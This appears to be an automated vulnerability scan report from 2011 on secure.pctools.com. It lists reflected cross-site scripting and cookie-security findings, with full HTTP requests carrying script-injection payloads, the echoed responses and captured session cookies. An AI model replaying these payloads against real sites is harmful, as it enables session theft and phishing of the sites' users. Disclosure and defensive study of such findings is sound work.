XSS, DORK, Cross Site Scripting, secure.pctools.com, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Mar 20 20:21:00 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. Cross-site scripting (reflected)

1.1. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 3]

1.2. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 3]

1.3. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 3]

1.4. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 3]

1.5. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 4]

1.6. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 4]

1.7. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 5]

1.8. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 5]

1.9. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 5]

1.10. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 5]

1.11. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 6]

1.12. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 6]

1.13. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 6]

1.14. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 6]

2. Password field with autocomplete enabled

2.1. https://secure.pctools.com/br/myaccount/

2.2. https://secure.pctools.com/cn/myaccount/

2.3. https://secure.pctools.com/de/myaccount/

2.4. https://secure.pctools.com/es/myaccount/

2.5. https://secure.pctools.com/fr/myaccount/

2.6. https://secure.pctools.com/it/myaccount/

2.7. https://secure.pctools.com/jp/myaccount/

2.8. https://secure.pctools.com/kr/myaccount/

2.9. https://secure.pctools.com/myaccount/

2.10. https://secure.pctools.com/nl/myaccount/

2.11. https://secure.pctools.com/ru/myaccount/

2.12. https://secure.pctools.com/zh/myaccount/

3. SSL cookie without secure flag set

3.1. https://secure.pctools.com/myaccount/logout/

3.2. https://secure.pctools.com/res/js/uniqueid.php

4. Cookie scoped to parent domain

5. Cross-domain script include

5.1. https://secure.pctools.com/company/

5.2. https://secure.pctools.com/company/awards/

5.3. https://secure.pctools.com/favicon.ico

5.4. https://secure.pctools.com/file-recover/

5.5. https://secure.pctools.com/firewall/

5.6. https://secure.pctools.com/free-antivirus/

5.7. https://secure.pctools.com/info/legalnotices/

5.8. https://secure.pctools.com/info/privacypolicy/

5.9. https://secure.pctools.com/internet-security/

5.10. https://secure.pctools.com/internet-security/download/

5.11. https://secure.pctools.com/internet-security/purchase/

5.12. https://secure.pctools.com/labs/

5.13. https://secure.pctools.com/mrc/dispute/

5.14. https://secure.pctools.com/mrc/infections/

5.15. https://secure.pctools.com/mrc/submit/

5.16. https://secure.pctools.com/partners/

5.17. https://secure.pctools.com/password-manager/

5.18. https://secure.pctools.com/pc-software/

5.19. https://secure.pctools.com/performance-toolkit/

5.20. https://secure.pctools.com/performance-toolkit/download/

5.21. https://secure.pctools.com/performance-toolkit/purchase/

5.22. https://secure.pctools.com/privacy-guardian/

5.23. https://secure.pctools.com/registry-mechanic/

5.24. https://secure.pctools.com/registry-mechanic/download/

5.25. https://secure.pctools.com/registry-mechanic/purchase/

5.26. https://secure.pctools.com/security-news/

5.27. https://secure.pctools.com/security-news/glossary/

5.28. https://secure.pctools.com/simple-backup/

5.29. https://secure.pctools.com/spyware-doctor-antivirus/

5.30. https://secure.pctools.com/spyware-doctor-antivirus/download/

5.31. https://secure.pctools.com/spyware-doctor-antivirus/purchase/

5.32. https://secure.pctools.com/spyware-doctor/

5.33. https://secure.pctools.com/spyware-doctor/download/

5.34. https://secure.pctools.com/spyware-doctor/purchase/

5.35. https://secure.pctools.com/support/

5.36. https://secure.pctools.com/synchronize/

6. Cookie without HttpOnly flag set

6.1. https://secure.pctools.com/myaccount/logout/

6.2. https://secure.pctools.com/res/js/uniqueid.php

7. Email addresses disclosed

7.1. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

7.2. https://secure.pctools.com/res/ajax/newsletter.php

7.3. https://secure.pctools.com/res/new/js/jquery.hoverIntent.minified.js

8. Cacheable HTTPS response

8.1. https://secure.pctools.com/authenticate/auth.php

8.2. https://secure.pctools.com/res/ajax/newsletter.php

9. Content type incorrectly stated

9.1. https://secure.pctools.com/registry-mechanic/payment/

9.2. https://secure.pctools.com/res/ajax/newsletter.php

9.3. https://secure.pctools.com/res/js/uniqueid.php

9.4. https://secure.pctools.com/spyware-doctor-antivirus/payment/

9.5. https://secure.pctools.com/spyware-doctor/payment/



1. Cross-site scripting (reflected)  next
There are 14 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag. The payload 727dc><script>alert(1)</script>4b3de3d4697 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myaccount/signup/%27%22--%3E%3C727dc><script>alert(1)</script>4b3de3d4697/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www2.pctools.com:8080
Date: Mon, 21 Mar 2011 01:16:05 GMT
Connection: keep-alive
Content-Length: 22345

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
<727dc><script>alert(1)</script>4b3de3d4697/style>
...[SNIP]...

1.2. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c40c2"><script>alert(1)</script>96bea22a6d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myaccount/signup/c40c2"><script>alert(1)</script>96bea22a6d1/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www2.pctools.com:8080
Date: Mon, 21 Mar 2011 01:16:08 GMT
Connection: keep-alive
Content-Length: 22285

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/myaccount/signup/c40c2"><script>alert(1)</script>96bea22a6d1/style>
...[SNIP]...

1.3. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbdb5"><script>alert(1)</script>08078998596f50b55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /myaccount/signup/dbdb5"><script>alert(1)</script>08078998596f50b55/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E?step=2e957eb8c030fc2d10de5607715f4c55&email=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000745%29%3C%2Fscript%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E
Cache-Control: max-age=0
Origin: https://secure.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671988|PC#1300668855394-755649.17#1301879728|check#true#1300670188; IS3_GSV=DPL-2_TES-1300668856_PCT-1300670164_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www2.pctools.com:8080
Date: Mon, 21 Mar 2011 01:17:40 GMT
Connection: keep-alive
Content-Length: 22357

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/myaccount/signup/dbdb5"><script>alert(1)</script>08078998596f50b55/style>
...[SNIP]...

1.4. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag. The payload e5d0d><script>alert(1)</script>ae3b19b193065abbd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /myaccount/signup/%27%22--%3E%3Ce5d0d><script>alert(1)</script>ae3b19b193065abbd/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E?step=2e957eb8c030fc2d10de5607715f4c55&email=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000745%29%3C%2Fscript%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E
Cache-Control: max-age=0
Origin: https://secure.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671988|PC#1300668855394-755649.17#1301879728|check#true#1300670188; IS3_GSV=DPL-2_TES-1300668856_PCT-1300670164_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:17:35 GMT
Connection: keep-alive
Content-Length: 22417

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
<e5d0d><script>alert(1)</script>ae3b19b193065abbd/style>
...[SNIP]...

1.5. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag. The payload f6649><script>alert(1)</script>6439626d9b9d243c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3Cf6649><script>alert(1)</script>6439626d9b9d243c3/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E?step=2e957eb8c030fc2d10de5607715f4c55&email=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000745%29%3C%2Fscript%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E
Cache-Control: max-age=0
Origin: https://secure.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671988|PC#1300668855394-755649.17#1301879728|check#true#1300670188; IS3_GSV=DPL-2_TES-1300668856_PCT-1300670164_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www2.pctools.com:8080
Date: Mon, 21 Mar 2011 01:17:45 GMT
Connection: keep-alive
Content-Length: 22417

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
<f6649><script>alert(1)</script>6439626d9b9d243c3/script>
...[SNIP]...

1.6. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag. The payload 9cec9><script>alert(1)</script>5f5a377f571 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3C9cec9><script>alert(1)</script>5f5a377f571/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
